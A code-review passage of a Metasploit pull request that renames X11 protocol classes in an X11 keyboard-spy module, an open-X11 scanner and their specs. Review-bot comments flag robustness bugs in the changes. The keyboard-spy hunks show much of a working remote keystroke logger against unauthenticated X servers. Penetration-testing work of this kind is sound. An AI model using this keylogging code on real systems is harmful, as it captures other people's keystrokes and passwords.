@@ -369,10 +381,10 @@ class BELLREQUEST < BinData::Record
uint8 :percent, initial_value: 50 # xxx do we want to change this?
uint8 :force_sound, initial_value: 0 # 0 = false, 1 true?
uint8 :sound_only, initial_value: 0 # 0 = false, 1 true?
- uint8 :pad
+ uint8 :pad0
uint16 :pitch, initial_value: 0
uint16 :duration, initial_value: 0
- uint16 :pad2
+ uint16 :pad1
uint32 :name, initial_value: 814 # XXX do we see this elsewhere?
uint32 :window
end
diff --git a/modules/auxiliary/gather/x11_keyboard_spy.rb b/modules/auxiliary/gather/x11_keyboard_spy.rb
index 9efb6d3189cd..ecb1c8f9feb2 100644
--- a/modules/auxiliary/gather/x11_keyboard_spy.rb
+++ b/modules/auxiliary/gather/x11_keyboard_spy.rb
@@ -60,7 +60,7 @@ def check
vprint_status('Establishing TCP Connection')
connect # tcp connection establish
vprint_status('Attempting X11 connection')
- sock.put(X11CONNECTIONREQUEST.new.to_binary_s) # x11 session establish
+ sock.put(X11ConnectionRequest.new.to_binary_s) # x11 session establish
connection = process_initial_connection_response(sock.get_once(-1, 1))
if connection.success == 1
return Exploit::CheckCode::Appears('Successfully established X11 connection')
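Review bot: `check` passes `sock.get_once(-1, 1)` directly to process_initial_connection_response, so a port that accepts the TCP connection but never answers hands nil to `X11ConnectionResponse.read`. `run` guards this case with `if data.nil?`, but `check` does not. Suggest reading into a local and adding `return Exploit::CheckCode::Unknown('No response to X11 connection attempt') if data.nil?` before parsing. The retry in process_initial_connection_response (next hunk) has the same gap: `packet += sock.get_once(-1, 1)` sits outside the inner begin/rescue and raises TypeError when the second read returns nil. The body of `check` starts and ends outside the hunk.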
@@ -71,12 +71,12 @@ def check
def process_initial_connection_response(packet)
begin
- connection = X11CONNECTION.read(packet)
+ connection = X11ConnectionResponse.read(packet)
rescue EOFError
vprint_bad("Connection packet malformed (size: #{packet.length}), attempting to get read more data")
packet += sock.get_once(-1, 1)
begin
- connection = X11CONNECTION.read(packet)
+ connection = X11ConnectionResponse.read(packet)
rescue StandardError
fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to parse X11 connection initialization response packet')
end
@@ -86,7 +86,7 @@ def process_initial_connection_response(packet)
def process_extension_query(packet, extension)
begin
- extension_response = QUERYEXTENSIONRESPONSE.read(packet)
+ extension_response = X11QueryExtensionResponse.read(packet)
rescue ::EOFError
packet += sock
fail_with(Msf::Module::Failure::UnexpectedReply, "Unable to process QueryExtension Response. Raw packet: #{packet}")
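Review bot: In the `rescue ::EOFError` branch, `packet += sock` adds the socket object to a String, which raises TypeError before `fail_with` can report the parse failure. If the intent mirrors process_initial_connection_response, read more data with `packet += sock.get_once(-1, 1).to_s` and retry the parse; otherwise drop the line. The failure message also interpolates the raw server bytes, so `#{packet.inspect}` would keep non-printable data out of the console. The method body continues outside the hunk.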
@@ -117,8 +117,8 @@ def build_sym_key_map(map_data)
character = sym.chr
character = '[space]' if character == ' '
rescue RangeError
- if KEYSYM_HASH.key? sym
- character = KEYSYM_HASH[sym]
+ if X11KEYSYM_HASH.key? sym
+ character = X11KEYSYM_HASH[sym]
else
character = "Unknown key sym: #{sym}"
end
@@ -158,8 +158,8 @@ def run
vprint_status('Establishing TCP Connection')
connect # tcp connection establish
- vprint_status('(1/9) Establishing X11 connection')
- sock.put(X11CONNECTIONREQUEST.new.to_binary_s) # x11 session establish
+ vprint_status('[1/9] Establishing X11 connection')
+ sock.put(X11ConnectionRequest.new.to_binary_s) # x11 session establish
data = sock.get_once(-1, 1)
fail_with(Msf::Module::Failure::UnexpectedReply, 'Port connected, but no response to X11 connection attempt') if data.nil?
connection = process_initial_connection_response(data)
@@ -168,58 +168,55 @@ def run
else
fail_with(Msf::Module::Failure::UnexpectedReply, 'Failed to establish an X11 connection')
end
- vprint_status("Version: #{connection.protocol_version_major}.#{connection.protocol_version_minor}")
- vprint_status("Screen Resolution: #{connection.screen_width_in_pixels}x#{connection.screen_height_in_pixels}")
- vprint_status("Resource ID: #{connection.resource_id_base.inspect}")
- vprint_status("Screen root: #{connection.screen_root.inspect}")
+ print_connection_info(connection, datastore['RHOST'], datastore['RPORT'])
- vprint_status('(2/9) Checking on BIG-REQUESTS extension')
- sock.put(QUERYEXTENSION.new(extension: 'BIG-REQUESTS', unused2: query_extension_calls).to_binary_s) # check if BIG-REQUESTS exist, not sure why
+ vprint_status('[2/9] Checking on BIG-REQUESTS extension')
+ sock.put(X11QueryExtensionRequest.new(extension: 'BIG-REQUESTS', unused2: query_extension_calls).to_binary_s) # check if BIG-REQUESTS exist, not sure why
query_extension_calls += 1
big_requests_plugin = process_extension_query(sock.get_once(-1, 1), 'BIG-REQUESTS')
- vprint_status('(3/9) Enabling BIG-REQUESTS')
- sock.put(EXTENSIONTOGGLE.new(opcode: big_requests_plugin.major_opcode).to_binary_s) # not sure why we do this
+ vprint_status('[3/9] Enabling BIG-REQUESTS')
+ sock.put(X11ExtensionToggleRequest.new(opcode: big_requests_plugin.major_opcode).to_binary_s) # not sure why we do this
sock.get_once(-1, 1)
- vprint_status('(4/9) Creating new graphical context')
- sock.put(X11CREATEGRAPHICALCONTEXTREQUEST.new(cid: connection.resource_id_base,
+ vprint_status('[4/9] Creating new graphical context')
+ sock.put(X11CreateGraphicalContextRequest.new(cid: connection.resource_id_base,
drawable: connection.screen_root,
gc_value_mask_background: 1).to_binary_s +
- X11GETPROPERTYREQUEST.new(window: connection.screen_root).to_binary_s) # not sure why we do this
+ X11GetPropertyRequest.new(window: connection.screen_root).to_binary_s) # not sure why we do this
sock.get_once(-1, 1)
- vprint_status('(5/9) Checking on XKEYBOARD extension')
- sock.put(QUERYEXTENSION.new(extension: 'XKEYBOARD', unused2: query_extension_calls).to_binary_s) # check if XKEYBOARD exist, not sure why
+ vprint_status('[5/9] Checking on XKEYBOARD extension')
+ sock.put(X11QueryExtensionRequest.new(extension: 'XKEYBOARD', unused2: query_extension_calls).to_binary_s) # check if XKEYBOARD exist, not sure why
xkeyboard_plugin = process_extension_query(sock.get_once(-1, 1), 'XKEYBOARD')
- vprint_status('(6/9) Enabling XKEYBOARD')
- sock.put(EXTENSIONTOGGLE.new(opcode: xkeyboard_plugin.major_opcode, wanted_major: 1).to_binary_s) # use keyboard
+ vprint_status('[6/9] Enabling XKEYBOARD')
+ sock.put(X11ExtensionToggleRequest.new(opcode: xkeyboard_plugin.major_opcode, wanted_major: 1).to_binary_s) # use keyboard
sock.get_once(-1, 1)
- vprint_status('(7/9) Requesting XKEYBOARD map')
- sock.put(GETMAPREQUEST.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
- full_key_types: 1,
- full_key_syms: 1,
- full_modifier_map: 1).to_binary_s) # not sure what this does
- map_data = GETMAPREPLY.read(sock.get_once(-1, 1))
+ vprint_status('[7/9] Requesting XKEYBOARD map')
+ sock.put(X11GetMapRequest.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+ full_key_types: 1,
+ full_key_syms: 1,
+ full_modifier_map: 1).to_binary_s) # not sure what this does
+ map_data = X11GetMapReply.read(sock.get_once(-1, 1))
- vprint_status('(8/9) Enabling notification on keyboard and map')
- sock.put(SELECTEVENTS.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
- affect_which_new_keyboard_notify: 1,
- affect_new_keyboard_key_codes: 1,
- affect_new_keyboard_device_id: 1).to_binary_s +
- SELECTEVENTS.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
- affect_which_map_notify: 1,
- affect_map_key_types: 1,
- affect_map_key_syms: 1,
- affect_map_modifier_map: 1,
- map_key_types: 1,
- map_key_syms: 1,
- map_modifier_map: 1).to_binary_s) # not sure what this does
+ vprint_status('[8/9] Enabling notification on keyboard and map')
+ sock.put(X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+ affect_which_new_keyboard_notify: 1,
+ affect_new_keyboard_key_codes: 1,
+ affect_new_keyboard_device_id: 1).to_binary_s +
+ X11SelectEvents.new(xkeyboard_id: xkeyboard_plugin.major_opcode,
+ affect_which_map_notify: 1,
+ affect_map_key_types: 1,
+ affect_map_key_syms: 1,
+ affect_map_modifier_map: 1,
+ map_key_types: 1,
+ map_key_syms: 1,
+ map_modifier_map: 1).to_binary_s) # not sure what this does
sock.get_once(-1, 1)
- vprint_status('(9/9) Creating local keyboard map')
+ vprint_status('[9/9] Creating local keyboard map')
key_map = build_sym_key_map(map_data)
last_key_press_array = Array.new(32, 0)
empty = Array.new(32, 0)
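Review bot: Steps 2 to 8 parse whatever a single `sock.get_once(-1, 1)` returns, e.g. `map_data = X11GetMapReply.read(sock.get_once(-1, 1))`: a timeout yields nil and a reply split across reads yields a short buffer, and neither is turned into a `fail_with` the way the nil case of the step 1 response is. Reading into a local first and adding `fail_with(Msf::Module::Failure::UnexpectedReply, 'No response to XKEYBOARD GetMap request') if map_packet.nil?` before the parse would match step 1. The same applies to both `process_extension_query(sock.get_once(-1, 1), ...)` calls and to `X11QueryKeyMapReply.read(sock.get_once(-1, 1)).data` in the polling hunk that follows. Separately, `print_connection_info(connection, datastore['RHOST'], datastore['RPORT'])` could use `rhost` and `rport`, as open_x11.rb does with `rport`. `run` starts and ends outside this hunk.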
@@ -232,8 +229,8 @@ def run
loop do
break if timeout > 0 && (stime + timeout < Time.now.to_f)
- sock.put(QUERYKEYMAPREQUEST.new.to_binary_s)
- bit_array_of_keystrokes = QUERYKEYMAPREPLY.read(sock.get_once(-1, 1)).data
+ sock.put(X11QueryKeyMapRequest.new.to_binary_s)
+ bit_array_of_keystrokes = X11QueryKeyMapReply.read(sock.get_once(-1, 1)).data
# we poll FAR quicker than a normal key press, so we need to filter repeats
next if bit_array_of_keystrokes == last_key_press_array # skip repeats
@@ -242,8 +239,8 @@ def run
end
ensure
vprint_status('Closing X11 connection')
- sock.put(X11FREEGRAPHICALCONTEXTREQUEST.new(gc: connection.resource_id_base).to_binary_s +
- X11GETINPUTFOCUSREQUEST.new.to_binary_s)
+ sock.put(X11FreeGraphicalContextRequest.new(gc: connection.resource_id_base).to_binary_s +
+ X11GetInputFocusRequest.new.to_binary_s)
disconnect
unless @keylogger_log == ''
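Review bot: The cleanup in this `ensure` dereferences `connection.resource_id_base` and writes to `sock` unconditionally, so if the protected block failed before `connection` was assigned (for instance at the `fail_with` for a nil first response) the ensure would raise NoMethodError and hide the original failure. Whether that path exists depends on where the matching `begin` sits, which is outside the hunk. A write error on a dead socket would likewise skip `disconnect`, so the `sock.put(...)` is worth guarding with `if sock && connection` and wrapping in its own `rescue StandardError`, leaving `disconnect` to run in every case.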
diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb
index 9466cd5a96c1..c0d3b1be4de4 100644
--- a/modules/auxiliary/scanner/x11/open_x11.rb
+++ b/modules/auxiliary/scanner/x11/open_x11.rb
@@ -42,36 +42,40 @@ def initialize
def run_host(ip)
connect
- sock.put(X11CONNECTIONREQUEST.new.to_binary_s) # x11 session establish
- packet = sock.get_once(-1, 1)
+ sock.put(X11ConnectionRequest.new.to_binary_s) # x11 session establish
+ packet = ''
+ connection = nil
begin
- connection = X11CONNECTION.read(packet)
- rescue EOFError
- vprint_bad("Connection packet malformed (size: #{packet.length}), attempting to get read more data")
- packet += sock.get_once(-1, 1)
- begin
- connection = X11CONNECTION.read(packet)
- if connection.success == 1
- print_good("#{ip} - Successly established X11 connection")
- vprint_status(" Vendor: #{connection.vendor}")
- vprint_status(" Version: #{connection.protocol_version_major}.#{connection.protocol_version_minor}")
- vprint_status(" Screen Resolution: #{connection.screen_width_in_pixels}x#{connection.screen_height_in_pixels}")
- vprint_status(" Resource ID: #{connection.resource_id_base.inspect}")
- vprint_status(" Screen root: #{connection.screen_root.inspect}")
- report_note(
- host: ip,
- proto: 'tcp',
- sname: 'x11',
- port: rport,
- type: 'x11.server_vendor',
- data: "Open X Server (#{connection.vendor})"
- )
- else
- vprint_error("#{ip} Access Denied")
+ loop do
+ new_data = sock.get_once(-1, 1)
+ break if new_data.nil?
+
+ packet += new_data
+ begin
+ connection = X11ConnectionResponse.read(packet)
+ break # Break loop if packet is successfully read
+ rescue EOFError
+ vprint_bad("Connection packet malformed (size: #{packet.length}), attempting to read more data")
+ # Continue looping to try and receive more data
end
- rescue StandardError
- vprint_bad('Failed to parse X11 connection initialization response packet')
end
+ rescue StandardError => e
+ vprint_bad("Error processing data: #{e}")
+ end
+
+ if connection.nil?
+ vprint_bad('No connection, or bad X11 response received')
+ return
+ end
+
+ begin
+ if connection.success == 1
+ print_connection_info(connection, ip, rport)
+ else
+ vprint_error("#{ip} Access Denied")
+ end
+ rescue StandardError
+ vprint_bad('Failed to parse X11 connection initialization response packet')
end
disconnect
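Review bot: The new read loop in run_host has no upper bound: a peer that keeps sending bytes that never complete a setup reply makes each `X11ConnectionResponse.read(packet)` raise EOFError, so `packet` keeps growing and the scanner thread stays on that host for as long as the peer keeps talking. A cap right after `packet += new_data`, for example `break if packet.length > 8 + (0xFFFF * 4)` (the setup reply's length field is 16 bits counted in 4-byte units), bounds both memory and time. The early `return` under `if connection.nil?` also skips the `disconnect` on the hunk's last line, so that call belongs in an `ensure` clause of run_host. The method's closing `end` is outside the hunk.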
diff --git a/spec/lib/msf/core/exploit/remote/x11.rb b/spec/lib/msf/core/exploit/remote/x11.rb
index 88b7afe02861..02ca680111cc 100644
--- a/spec/lib/msf/core/exploit/remote/x11.rb
+++ b/spec/lib/msf/core/exploit/remote/x11.rb
@@ -52,7 +52,7 @@
describe 'handles GetProperty response' do
it do
- response = Msf::Exploit::Remote::X11::X11GETPROPERTYRESPONSE.read(get_property_resp)
+ response = Msf::Exploit::Remote::X11::X11GetPropertyResponse.read(get_property_resp)
expect(response.get_property_type).to eq(31) # \x1f\x00\x00\x00
expect(response.sequence_number).to eq(4) # \x04\x00
expect(response.value_data).to eq("Xft.dpi:\t96\nXft.antialias:\t1\nXft.hinting:\t1\nXft.hintstyle:\thintslight\nXft.rgba:\trgb\nXcursor.size:\t24\nXcursor.theme:\tYaru\n")
@@ -61,9 +61,9 @@
describe 'handles GetProperty request' do
it do
- request = Msf::Exploit::Remote::X11::X11GETPROPERTYREQUEST.new(window: 1320)
+ request = Msf::Exploit::Remote::X11::X11GetPropertyRequest.new(window: 1320)
expect(request.to_binary_s).to eq(get_property)
- request = Msf::Exploit::Remote::X11::X11GETPROPERTYREQUEST.read(get_property)
+ request = Msf::Exploit::Remote::X11::X11GetPropertyRequest.read(get_property)
expect(request.content_length).to eq(100_000_000)
expect(request.window).to eq(1320)
end
@@ -71,14 +71,14 @@
describe 'creates a graphical context request' do
it do
- request = Msf::Exploit::Remote::X11::X11CREATEGRAPHICALCONTEXTREQUEST.read(creategc)
+ request = Msf::Exploit::Remote::X11::X11CreateGraphicalContextRequest.read(creategc)
expect(request.opcode).to eq(55)
expect(request.request_length).to eq(5)
expect(request.cid).to eq(16777216)
expect(request.drawable).to eq(1320)
expect(request.gc_value_mask_background).to eq(1)
expect(request.background).to eq(16777215)
- request = Msf::Exploit::Remote::X11::X11CREATEGRAPHICALCONTEXTREQUEST.new(
+ request = Msf::Exploit::Remote::X11::X11CreateGraphicalContextRequest.new(
cid: 16777216,
drawable: 1320,
gc_value_mask_background: 1
@@ -89,46 +89,44 @@
describe 'handles GetInputFocus request' do
it do
- request = Msf::Exploit::Remote::X11::X11GETINPUTFOCUSREQUEST.new
+ request = Msf::Exploit::Remote::X11::X11GetInputFocusRequest.new
expect(request.to_binary_s).to eq(get_input_focus)
- request = Msf::Exploit::Remote::X11::X11GETINPUTFOCUSREQUEST.read(get_input_focus)
+ request = Msf::Exploit::Remote::X11::X11GetInputFocusRequest.read(get_input_focus)
expect(request.opcode).to eq(43)
end
end
describe 'handles FreeGraphicalContext request' do
it do
- request = Msf::Exploit::Remote::X11::X11FREEGRAPHICALCONTEXTREQUEST.new(
+ request = Msf::Exploit::Remote::X11::X11FreeGraphicalContextRequest.new(
gc: 33554432
)
expect(request.to_binary_s).to eq(free_gc)
- request = Msf::Exploit::Remote::X11::X11FREEGRAPHICALCONTEXTREQUEST.read(free_gc)
+ request = Msf::Exploit::Remote::X11::X11FreeGraphicalContextRequest.read(free_gc)
expect(request.opcode).to eq(60)
expect(request.gc).to eq(33554432)
end
end
-
describe 'creates InternAtom requests' do
it do
- request = Msf::Exploit::Remote::X11::X11INTERNATOMREQUEST.new(
- name: "Wait",
+ request = Msf::Exploit::Remote::X11::X11InternAtomRequest.new(
+ name: 'Wait'
)
expect(request.to_binary_s).to eq(intern_atom_wait)
expect(request.opcode).to eq(16)
expect(request.request_length).to eq(3)
- expect(request.name).to eq("Wait")
+ expect(request.name).to eq('Wait')
expect(request.only_if_exists).to eq(0)
-
- request = Msf::Exploit::Remote::X11::X11INTERNATOMREQUEST.new(
+
+ request = Msf::Exploit::Remote::X11::X11InternAtomRequest.new(
name: "SERVER_OVERLAY_VISUALS\x00\x00", only_if_exists: 1
)
expect(request.to_binary_s).to eq(intern_atom_server_overlay_visuals)
expect(request.opcode).to eq(16)
expect(request.request_length).to eq(8)
- expect(request.name).to eq("SERVER_OVERLAY_VISUALS")
+ expect(request.name).to eq('SERVER_OVERLAY_VISUALS')
expect(request.only_if_exists).to eq(1)
end
end
-
-end
\ No newline at end of file
+end
diff --git a/spec/lib/msf/core/exploit/remote/x11/connect.rb b/spec/lib/msf/core/exploit/remote/x11/connect.rb
index 14b440bbf5aa..d7819837312c 100644
--- a/spec/lib/msf/core/exploit/remote/x11/connect.rb
+++ b/spec/lib/msf/core/exploit/remote/x11/connect.rb
@@ -1221,16 +1221,16 @@
describe 'creates connection request' do
it do
- request = Msf::Exploit::Remote::X11::X11CONNECTIONREQUEST.read(conn_request)
+ request = Msf::Exploit::Remote::X11::X11ConnectionRequest.read(conn_request)
expect(request.to_binary_s).to eq(conn_request)
- request = Msf::Exploit::Remote::X11::X11CONNECTIONREQUEST.new
+ request = Msf::Exploit::Remote::X11::X11ConnectionRequest.new
expect(request.to_binary_s).to eq(conn_request)
end
end
describe 'handles connection response' do
it do
- response = Msf::Exploit::Remote::X11::X11CONNECTION.read(conn_resp)
+ response = Msf::Exploit::Remote::X11::X11ConnectionResponse.read(conn_resp)
expect(response.success).to eq(1)
expect(response.resource_id_base).to eq(16777216)
expect(response.vendor).to eq('The X.Org Foundation')
@@ -1241,7 +1241,7 @@
describe 'handles connection response 2' do
it do
- response = Msf::Exploit::Remote::X11::X11CONNECTION.read(conn_resp2)
+ response = Msf::Exploit::Remote::X11::X11ConnectionResponse.read(conn_resp2)
expect(response.success).to eq(1)
expect(response.resource_id_base).to eq(52428800)
expect(response.vendor).to eq('The X.Org Foundation')
@@ -1249,4 +1249,4 @@
expect(response.screen_height_in_pixels).to eq(832)
end
end
-end
\ No newline at end of file
+end
diff --git a/spec/lib/msf/core/exploit/remote/x11/extensions.rb b/spec/lib/msf/core/exploit/remote/x11/extensions.rb
index cd3abf26f14b..1d14d2a621f2 100644
--- a/spec/lib/msf/core/exploit/remote/x11/extensions.rb
+++ b/spec/lib/msf/core/exploit/remote/x11/extensions.rb
@@ -30,25 +30,25 @@
describe 'creates QueryExtension request for full length plugin' do
it do
- request = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSION.read(query_extension)
- expect(request.extension).to eq("BIG-REQUESTS")
- request = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSION.new(extension: 'BIG-REQUESTS')
+ request = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionRequest.read(query_extension)
+ expect(request.extension).to eq('BIG-REQUESTS')
+ request = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionRequest.new(extension: 'BIG-REQUESTS')
expect(request.to_binary_s).to eq(query_extension)
end
end
describe 'creates QueryExtension request for short length plugin' do
it do
- request = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSION.read(query_extension2)
- expect(request.extension).to eq("XKEYBOARD")
- request = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSION.new(extension: 'XKEYBOARD')
+ request = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionRequest.read(query_extension2)
+ expect(request.extension).to eq('XKEYBOARD')
+ request = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionRequest.new(extension: 'XKEYBOARD')
expect(request.to_binary_s).to eq(query_extension2)
end
end
describe 'handles QueryExtension response' do
it do
- response = Msf::Exploit::Remote::X11::Extensions::QUERYEXTENSIONRESPONSE.read(query_extension_resp)
+ response = Msf::Exploit::Remote::X11::Extensions::X11QueryExtensionResponse.read(query_extension_resp)
expect(response.major_opcode).to eq(134)
expect(response.present).to eq(1)
end
@@ -56,13 +56,13 @@
describe 'creates Extension Toggle request' do
it do
- request = Msf::Exploit::Remote::X11::Extensions::EXTENSIONTOGGLE.read(enable_134)
+ request = Msf::Exploit::Remote::X11::Extensions::X11ExtensionToggleRequest.read(enable_134)
expect(request.opcode).to eq(134)
expect(request.wanted_major).to eq(0)
expect(request.wanted_major).to eq(0)
expect(request.request_length).to eq(1)
- request = Msf::Exploit::Remote::X11::Extensions::EXTENSIONTOGGLE.new(opcode: 134)
+ request = Msf::Exploit::Remote::X11::Extensions::X11ExtensionToggleRequest.new(opcode: 134)
expect(request.to_binary_s).to eq(enable_134)
end
end
-end
\ No newline at end of file
+end
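Review bot: `expect(request.wanted_major).to eq(0)` appears twice in a row in the 'creates Extension Toggle request' example, so the second assertion adds no coverage. It was probably meant to check a different field of the toggle request (the minor version, if the record defines one). Replacing the duplicate with that field, or dropping it, would make the example say what it tests.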
diff --git a/spec/lib/msf/core/exploit/remote/x11/window.rb b/spec/lib/msf/core/exploit/remote/x11/window.rb
index bae4c0ead98d..7af95b789eec 100644
--- a/spec/lib/msf/core/exploit/remote/x11/window.rb
+++ b/spec/lib/msf/core/exploit/remote/x11/window.rb
@@ -2569,7 +2569,6 @@
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-
end
let(:getcolors_response) do
@@ -2776,27 +2775,27 @@
describe 'creates GET requests for different functions' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::GETREQUEST.read(get_window_attributes)
+ request = Msf::Exploit::Remote::X11::Window::X11GetRequest.read(get_window_attributes)
expect(request.opcode).to eq(3)
expect(request.request_length).to eq(2)
expect(request.window).to eq(1320)
- request = Msf::Exploit::Remote::X11::Window::GETREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11GetRequest.new(
window: 1320,
opcode: 3,
- unused: 3
+ pad: 3
)
expect(request.to_binary_s).to eq(get_window_attributes)
- request = Msf::Exploit::Remote::X11::Window::GETREQUEST.read(get_geometry)
+ request = Msf::Exploit::Remote::X11::Window::X11GetRequest.read(get_geometry)
expect(request.opcode).to eq(14)
expect(request.request_length).to eq(2)
expect(request.window).to eq(1320)
- request = Msf::Exploit::Remote::X11::Window::GETREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11GetRequest.new(
window: 1320,
opcode: 14,
- unused: 4
+ pad: 4
)
expect(request.to_binary_s).to eq(get_geometry)
end
@@ -2805,7 +2804,7 @@
describe 'creates TranslateCoordinates request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::TRANSLATECOORDINATESREQUEST.read(translate_request)
+ request = Msf::Exploit::Remote::X11::Window::X11TranslateCoordinatesRequest.read(translate_request)
expect(request.opcode).to eq(40)
expect(request.request_length).to eq(4)
expect(request.src_window).to eq(1320)
@@ -2813,11 +2812,11 @@
expect(request.src_x).to eq(0)
expect(request.src_y).to eq(0)
- request = Msf::Exploit::Remote::X11::Window::TRANSLATECOORDINATESREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11TranslateCoordinatesRequest.new(
src_window: 1320,
dst_window: 1320,
opcode: 40,
- unused: 3
+ pad: 3
)
expect(request.to_binary_s).to eq(translate_request)
end
@@ -2826,11 +2825,11 @@
describe 'creates QueryTree request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::QUERYTREEREQUEST.read(querytree_request)
+ request = Msf::Exploit::Remote::X11::Window::X11QueryTreeRequest.read(querytree_request)
expect(request.opcode).to eq(15)
expect(request.request_length).to eq(2)
- request = Msf::Exploit::Remote::X11::Window::QUERYTREEREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11QueryTreeRequest.new(
drawable: 1320
)
expect(request.to_binary_s).to eq(querytree_request)
@@ -2840,7 +2839,7 @@
describe 'handles QueryTree response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::QUERYTREERESPONSE.read(querytree_response)
+ response = Msf::Exploit::Remote::X11::Window::X11QueryTreeResponse.read(querytree_response)
expect(response.children_len).to eq(72)
expect(response.root_window).to eq(1320)
expect(response.parent_window).to eq(0)
@@ -2851,7 +2850,7 @@
describe 'handles GetWindowAttributes response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::GETWINDOWATTRIBUTESRESPONSE.read(windowattributes_response)
+ response = Msf::Exploit::Remote::X11::Window::X11GetWindowAttributeResponse.read(windowattributes_response)
expect(response.depth).to eq(1)
expect(response.visual_id).to eq(4352)
expect(response.class_name).to eq(0)
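Review bot: The new class name `X11GetWindowAttributeResponse` is singular, while the example title ('handles GetWindowAttributes response') and the fixture `windowattributes_response` use the plural. If the name has not shipped yet, `X11GetWindowAttributesResponse` would keep it aligned with the request-derived names used for the sibling records (`X11GetGeometryResponse`, `X11QueryTreeResponse`). The example continues outside the hunk.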
@@ -2863,7 +2862,7 @@
describe 'handles GetGeometry response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::GETGEOMETRYRESPONSE.read(getgeometry_response)
+ response = Msf::Exploit::Remote::X11::Window::X11GetGeometryResponse.read(getgeometry_response)
expect(response.depth).to eq(1)
expect(response.root).to eq(4608)
expect(response.x).to eq(0)
@@ -2877,7 +2876,7 @@
describe 'creates GetImage request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::GETIMAGEREQUEST.read(getimage_request)
+ request = Msf::Exploit::Remote::X11::Window::X11GetImageRequest.read(getimage_request)
expect(request.opcode).to eq(73)
expect(request.image_pixmap_format).to eq(2)
expect(request.request_length).to eq(5)
@@ -2888,7 +2887,7 @@
expect(request.height).to eq(21)
expect(request.plane_mask).to eq(4294967295)
- request = Msf::Exploit::Remote::X11::Window::GETIMAGEREQUEST.new(
+ request = Msf::Exploit::Remote::X11::Window::X11GetImageRequest.new(
x: 0, y: 0,
width: 954, height: 21,
drawable: 41943043
@@ -2900,11 +2899,11 @@
describe 'handles GetImage response' do
it do
# test against packet pulled from wireshark
- response = Msf::Exploit::Remote::X11::Window::GETIMAGERESPONSE.read(getimage_response)
+ response = Msf::Exploit::Remote::X11::Window::X11GetImageResponse.read(getimage_response)
expect(response.response_type).to eq(1)
expect(response.depth).to eq(32)
expect(response.sequence_number).to eq(171)
- expect(response.reply_length).to eq(10_000)
+ expect(response.response_length).to eq(10_000)
expect(response.visual_id).to eq(1291)
expect(response.image_data.length).to eq(10_000)
end
@@ -2913,17 +2912,16 @@
describe 'creates GetColors request' do
it do
# test against packet pulled from wireshark
- request = Msf::Exploit::Remote::X11::Window::GETCOLORSREQUEST.read(getcolors_request)
+ request = Msf::Exploit::Remote::X11::Window::X11GetColorsRequest.read(getcolors_request)
expect(request.opcode).to eq(91)
expect(request.color_map).to eq(41943042)
expect(request.request_length).to eq(258)
expect(request.pixels).to eq([0, 65793, 131586, 197379, 263172, 328965, 394758, 460551, 526344, 592137, 657930, 723723, 789516, 855309, 921102, 986895, 1052688, 1118481, 1184274, 1250067, 1315860, 1381653, 1447446, 1513239, 1579032, 1644825, 1710618, 1776411, 1842204, 1907997, 1973790, 2039583, 2105376, 2171169, 2236962, 2302755, 2368548, 2434341, 2500134, 2565927, 2631720, 2697513, 2763306, 2829099, 2894892, 2960685, 3026478, 3092271, 3158064, 3223857, 3289650, 3355443, 3421236, 3487029, 3552822, 3618615, 3684408, 3750201, 3815994, 3881787, 3947580, 4013373, 4079166, 4144959, 4210752, 4276545, 4342338, 4408131, 4473924, 4539717, 4605510, 4671303, 4737096, 4802889, 4868682, 4934475, 5000268, 5066061, 5131854, 5197647, 5263440, 5329233, 5395026, 5460819, 5526612, 5592405, 5658198, 5723991, 5789784, 5855577, 5921370, 5987163, 6052956, 6118749, 6184542, 6250335, 6316128, 6381921, 6447714, 6513507, 6579300, 6645093, 6710886, 6776679, 6842472, 6908265, 6974058, 7039851, 7105644, 7171437, 7237230, 7303023, 7368816, 7434609, 7500402, 7566195, 7631988, 7697781, 7763574, 7829367, 7895160, 7960953, 8026746, 8092539, 8158332, 8224125, 8289918, 8355711, 8421504, 8487297, 8553090, 8618883, 8684676, 8750469, 8816262, 8882055, 8947848, 9013641, 9079434, 9145227, 9211020, 9276813, 9342606, 9408399, 9474192, 9539985, 9605778, 9671571, 9737364, 9803157, 9868950, 9934743, 10000536, 10066329, 10132122, 10197915, 10263708, 10329501, 10395294, 10461087, 10526880, 10592673, 10658466, 10724259, 10790052, 10855845, 10921638, 10987431, 11053224, 11119017, 11184810, 11250603, 11316396, 11382189, 11447982, 11513775, 11579568, 11645361, 11711154, 11776947, 11842740, 11908533, 11974326, 12040119, 12105912, 12171705, 12237498, 12303291, 12369084, 12434877, 12500670, 12566463, 12632256, 12698049, 12763842, 12829635, 12895428, 12961221, 13027014, 13092807, 13158600, 13224393, 13290186, 13355979, 13421772, 13487565, 13553358, 13619151, 13684944, 13750737, 13816530, 13882323, 